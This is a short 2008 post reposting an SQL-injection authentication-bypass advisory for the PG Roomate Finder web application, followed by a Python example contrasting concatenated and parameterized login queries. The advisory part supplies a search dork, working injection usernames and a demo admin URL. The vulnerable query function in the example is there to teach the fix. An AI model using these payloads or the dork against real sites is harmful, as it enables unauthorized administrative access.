"The Devil Is the Voice Within; Listen to That Voice"

-Zorlu BUĞRAHAN-

Sunday, 23 November 2008

PG Roomate Finder Solution (Auth Bypass) SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7201

Discovered By: ZoRLu

dork: "Powered by PG Roomate Finder Solution - roommate estate web site design"

Exploit:

username: [real_admin_name] ' or ' 1=1

password: ZoRLu

note: the admin name is generally: admin


exploit for demo:

login: http://www.realtysoft.pro/roommate/demo/admin/index.php

username: admin ' or ' 1=1--

password: ZoRLu
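The following is an added example, not code from the advisory or from the product: it shows why a login check built by string concatenation accepts the username strings above, next to the parameterized form that rejects them. The query shape, the `admins` table, its columns and the stored password are hypothetical, and a MySQL-style backend is assumed (the page does not show the product's real query).

```python
import sqlite3

def make_db():
    """Constructed sample data; table and column names are hypothetical."""
    db = sqlite3.connect(":memory:")
    # COLLATE RTRIM mimics MySQL's default PAD SPACE collations, where
    # 'admin ' and 'admin' compare equal (MySQL backend is an assumption).
    db.execute("CREATE TABLE admins (login TEXT COLLATE RTRIM, password TEXT)")
    db.execute("INSERT INTO admins VALUES ('admin', 'constructed-secret')")
    return db

def login_concat(db, user, pw):
    """Vulnerable pattern: form input is spliced into the SQL text."""
    sql = ("SELECT login FROM admins "
           "WHERE login = '%s' AND password = '%s'" % (user, pw))
    # With the advisory's username the WHERE clause parses as
    #   login = 'admin ' OR (' 1=1' AND password = 'ZoRLu')
    # AND binds tighter than OR, so the password test no longer gates the row.
    return db.execute(sql).fetchone() is not None

def login_param(db, user, pw):
    """Hardened pattern: values are bound as data, never parsed as SQL."""
    sql = "SELECT login FROM admins WHERE login = ? AND password = ?"
    return db.execute(sql, (user, pw)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    # Both username strings are the ones quoted in the advisory.
    for user in ("admin ' or ' 1=1", "admin ' or ' 1=1--"):
        print(repr(user),
              "concatenated:", login_concat(db, user, "ZoRLu"),
              "parameterized:", login_param(db, user, "ZoRLu"))
```

With bound parameters the whole username string is compared against the `login` column as a single value, so neither string matches the `admin` row.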
